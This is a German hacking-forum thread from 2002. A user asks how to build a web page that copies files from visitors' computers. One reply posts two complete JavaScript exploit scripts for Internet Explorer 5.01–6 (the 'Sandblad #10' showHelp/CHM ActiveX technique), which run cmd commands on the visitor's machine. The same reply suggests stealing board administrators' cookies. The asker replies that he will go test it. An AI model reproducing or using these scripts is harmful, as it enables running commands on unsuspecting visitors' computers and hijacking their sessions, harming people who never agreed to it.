17.11.2002, 23:50
|
 - 1  |
| Gast
Beiträge: n/a
| 
hi leutz ich hab mal ne frage ich wollte eine hp erstellen womit ich dateien von anderen runterziehen kann. geht sowas ? ich hab von irgend einer sicherheitslücke im IE gehört damit wäre es machbar, weiss aber nicht ob es stimmt. plz help   |
|
|  |
|
18.11.2002, 00:01
|
- 2 |
| Neuer Benutzer Registriert seit: 16.07.2002
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
lol monro du hast immer die ausgefallensten fragen auf lager respekt digga  also duch schwachstelle im IE von version 5.01 bis 6.028 kann einem webmaster ermöglichen auf persönliche daten des besuchers zuzugreifen, aber das zugreifen funktioniert nicht wie bei einem troja wo du machen kannst was du willst, sondern im javascript muss du vorher einstellen was das script genau machen muss. aber diese einstellung könnte dir weiterhelfen hehehier ein script das ich selbst getestet habe und es geht: <script> prog = 'cmd'; args = '/k echo You are vulnerable (Sandblad #10) & '+ 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:') "); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=","+prog+","+args+""></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> <HTML> <BODY> <script> prog = 'cmd'; args = '/k net send * ..spieletermine..Networks..visit..us...www.google. de...'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:') "); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=","+prog+","+args+""></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> </BODY> </HTML> naja ganze HD zu kopieren würde ich nicht unbedigt empfehlen *g* aber was ganz interessant ist, sind cookies wenn der besucher z.B. admin von irgend einem board ist, den rest kannst du dir ja denken....... |
![[C.T.X]-ebr!s- ist offline](http://www.37x.de/../images/statusicon/user_offline.gif)
| |
|
18.11.2002, 00:07
|
- 3 |
| Gast
Beiträge: n/a
|
jo thx mein bester ich geh mal bisschen testen....
|
|
| |
|
18.11.2002, 21:36
|
- 4 |
| Neuer Benutzer Registriert seit: 30.07.2002
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
schau dir am besten diese seite auch mal an http://www.heise.de/ct/browsercheck/e5demo.shtml |
|
| |
| Werbung | |
| |
--
|
|
25.11.2002, 15:44
|
- 5 |
| Neuer Benutzer Registriert seit: 02.11.2002
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
nunja das sehe ich eher als kriminell an als das was ich gefragt habe , aber ich sag nun mal nichts
|
|
| |
|
28.11.2002, 09:46
|
- 6 |
| Neuer Benutzer Registriert seit: 14.11.2002
Beiträge: 0
Abgegebene Danke: 0
Erhielt 0 Danke für 0 Beiträge
|
@biene haeh versteh ich nu gar nich uebrigens bei mir funzt dsa exploit net! Mozilla is n!ce
|
|
| |
 |
Linear-Darstellung
| |
Alle Zeitangaben in WEZ +2. Es ist jetzt 10:23 Uhr.